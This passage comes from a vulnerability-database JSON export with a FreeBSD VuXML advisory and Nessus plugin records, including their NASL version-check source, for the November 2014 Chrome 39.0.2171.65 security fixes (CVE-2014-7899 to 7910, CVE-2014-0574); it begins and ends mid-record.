Use-after-free in pdfium. Credit\n\t to cloudfuzzer.\n[414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit\n\t to cloudfuzzer.\n[418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to\n\t Atte Kettunen from OUSPG.\n[421817] High CVE-2014-7905: Flaw allowing navigation to\n\t intents that do not have the BROWSABLE category. 
Credit to\n\t WangTao(neobyte) of Baidu X-Team.\n[423030] High CVE-2014-7906: Use-after-free in pepper plugins.\n\t Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n[423703] High CVE-2014-0574: Double-free in Flash. Credit to\n\t biloulehibou.\n[424453] High CVE-2014-7907: Use-after-free in blink. Credit to\n\t Chen Zhang (demi6od) of the NSFOCUS Security Team.\n[425980] High CVE-2014-7908: Integer overflow in media. Credit\n\t to Christoph Diehl.\n[391001] Medium CVE-2014-7909: Uninitialized memory read in\n\t Skia. Credit to miaubiz.\nCVE-2014-7910: Various fixes from internal audits, fuzzing and\n\t other initiatives.\n\n\n", "edition": 4, "modified": "2014-11-18T00:00:00", "published": "2014-11-18T00:00:00", "id": "D395E44F-6F4F-11E4-A444-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/d395e44f-6f4f-11e4-a444-00262d5ed8ee.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:50:30", "description": "Google Chrome Releases reports :\n\n42 security fixes in this release, including :\n\n- [389734] High CVE-2014-7899: Address bar spoofing. Credit to Eli\nGrey.\n\n- [406868] High CVE-2014-7900: Use-after-free in pdfium. Credit to\nAtte Kettunen from OUSPG.\n\n- [413375] High CVE-2014-7901: Integer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [414504] High CVE-2014-7902: Use-after-free in pdfium. Credit to\ncloudfuzzer.\n\n- [414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to Atte\nKettunen from OUSPG.\n\n- [421817] High CVE-2014-7905: Flaw allowing navigation to intents\nthat do not have the BROWSABLE category. 
Credit to WangTao(neobyte) of\nBaidu X-Team.\n\n- [423030] High CVE-2014-7906: Use-after-free in pepper plugins.\nCredit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n\n- [423703] High CVE-2014-0574: Double-free in Flash. Credit to\nbiloulehibou.\n\n- [424453] High CVE-2014-7907: Use-after-free in blink. Credit to Chen\nZhang (demi6od) of the NSFOCUS Security Team.\n\n- [425980] High CVE-2014-7908: Integer overflow in media. Credit to\nChristoph Diehl.\n\n- [391001] Medium CVE-2014-7909: Uninitialized memory read in Skia.\nCredit to miaubiz.\n\n- CVE-2014-7910: Various fixes from internal audits, fuzzing and other\ninitiatives.", "edition": 21, "published": "2014-11-19T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (d395e44f-6f4f-11e4-a444-00262d5ed8ee)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2014-11-19T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_D395E44F6F4F11E4A44400262D5ED8EE.NASL", "href": "https://www.tenable.com/plugins/nessus/79320", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79320);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (d395e44f-6f4f-11e4-a444-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n42 security fixes in this release, including :\n\n- [389734] High CVE-2014-7899: Address bar spoofing. Credit to Eli\nGrey.\n\n- [406868] High CVE-2014-7900: Use-after-free in pdfium. Credit to\nAtte Kettunen from OUSPG.\n\n- [413375] High CVE-2014-7901: Integer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [414504] High CVE-2014-7902: Use-after-free in pdfium. Credit to\ncloudfuzzer.\n\n- [414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to Atte\nKettunen from OUSPG.\n\n- [421817] High CVE-2014-7905: Flaw allowing navigation to intents\nthat do not have the BROWSABLE category. Credit to WangTao(neobyte) of\nBaidu X-Team.\n\n- [423030] High CVE-2014-7906: Use-after-free in pepper plugins.\nCredit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n\n- [423703] High CVE-2014-0574: Double-free in Flash. Credit to\nbiloulehibou.\n\n- [424453] High CVE-2014-7907: Use-after-free in blink. Credit to Chen\nZhang (demi6od) of the NSFOCUS Security Team.\n\n- [425980] High CVE-2014-7908: Integer overflow in media. 
Credit to\nChristoph Diehl.\n\n- [391001] Medium CVE-2014-7909: Uninitialized memory read in Skia.\nCredit to miaubiz.\n\n- CVE-2014-7910: Various fixes from internal audits, fuzzing and other\ninitiatives.\"\n );\n # http://googlechromereleases.blogspot.nl/2014/11/stable-channel-update_18.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f4b30c17\"\n );\n # https://vuxml.freebsd.org/freebsd/d395e44f-6f4f-11e4-a444-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a894c63a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<39.0.2171.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<39.0.2171.65\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:21:29", "description": "The version of Google Chrome installed on the remote Windows host is a\nversion prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. 
(CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)", "edition": 26, "published": "2014-11-19T00:00:00", "title": "Google Chrome < 39.0.2171.65 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_39_0_2171_65.NASL", "href": "https://www.tenable.com/plugins/nessus/79336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79336);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0574\",\n \"CVE-2014-7899\",\n \"CVE-2014-7900\",\n \"CVE-2014-7901\",\n \"CVE-2014-7902\",\n \"CVE-2014-7903\",\n \"CVE-2014-7904\",\n \"CVE-2014-7906\",\n \"CVE-2014-7907\",\n \"CVE-2014-7908\",\n \"CVE-2014-7909\",\n \"CVE-2014-7910\"\n );\n script_bugtraq_id(\n 71041,\n 71158,\n 71159,\n 71160,\n 71161,\n 71163,\n 71164,\n 71165,\n 71166,\n 71167,\n 71168,\n 71170\n );\n\n script_name(english:\"Google Chrome < 39.0.2171.65 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The version of Google Chrome installed on the remote Windows host is a\nversion prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. 
(CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc00508c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 39.0.2171.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0574\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'39.0.2171.65', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:48:28", "description": "The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 39.0.2171.65. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. 
(CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)", "edition": 26, "published": "2014-11-19T00:00:00", "title": "Google Chrome < 39.0.2171.65 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_39_0_2171_65.NASL", "href": "https://www.tenable.com/plugins/nessus/79337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79337);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0574\",\n \"CVE-2014-7899\",\n \"CVE-2014-7900\",\n \"CVE-2014-7901\",\n \"CVE-2014-7902\",\n \"CVE-2014-7903\",\n \"CVE-2014-7904\",\n \"CVE-2014-7906\",\n \"CVE-2014-7907\",\n \"CVE-2014-7908\",\n \"CVE-2014-7909\",\n \"CVE-2014-7910\"\n );\n script_bugtraq_id(\n 71041,\n 71158,\n 71159,\n 71160,\n 71161,\n 71163,\n 71164,\n 71165,\n 71166,\n 71167,\n 71168,\n 71170\n );\n\n script_name(english:\"Google Chrome < 39.0.2171.65 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\na version prior to 39.0.2171.65. 
It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A double-free vulnerability exists in the version of\n Adobe Flash bundled with Chrome which could result in\n arbitrary code execution. (CVE-2014-0574)\n\n - An unspecified address bar spoofing vulnerability\n exists which could be used to aid in phishing attacks.\n (CVE-2014-7899)\n\n - Multiple use-after-free vulnerabilities exist in pdfium\n which could result in arbitrary code execution.\n (CVE-2014-7900, CVE-2014-7902)\n\n - Integer overflow vulnerabilities exist in pdfium and\n the media component which could result in arbitrary\n code execution. (CVE-2014-7901, CVE-2014-7908)\n\n - Buffer overflow vulnerabilities exist in pdfium and\n Skia which could result in arbitrary code execution.\n (CVE-2014-7903, CVE-2014-7904)\n\n - Use-after-free vulnerabilities exist in Pepper plugins\n and Blink which could result in arbitrary code\n execution. (CVE-2014-7906, CVE-2014-7907)\n\n - An unspecified uninitialized memory read exists.\n (CVE-2014-7909)\n\n - Multiple unspecified vulnerabilities exist.\n (CVE-2014-7910)\");\n # http://googlechromereleases.blogspot.com/2014/11/stable-channel-update_18.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc00508c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 39.0.2171.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0574\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'39.0.2171.65', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:15:11", "description": "Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907,\nCVE-2014-7910, CVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. 
A\nmalicious attacker could use this flaw to perform phishing attacks.\n(CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 39.0.2171.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.", "edition": 22, "published": "2014-11-25T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2014:1894)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7910"], "modified": "2014-11-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:6.6", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1894.NASL", "href": "https://www.tenable.com/plugins/nessus/79426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1894. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79426);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-7899\", \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n script_bugtraq_id(71159, 71160, 71161, 71166, 71167, 71168, 71170);\n script_xref(name:\"RHSA\", value:\"2014:1894\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2014:1894)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2014-7904, CVE-2014-7906, CVE-2014-7907,\nCVE-2014-7910, CVE-2014-7908, CVE-2014-7909)\n\nA flaw was found in the way Chromium parsed certain URL values. 
A\nmalicious attacker could use this flaw to perform phishing attacks.\n(CVE-2014-7899)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 39.0.2171.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # https://googlechromereleases.blogspot.com/2014/11/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2014/11/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7909\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
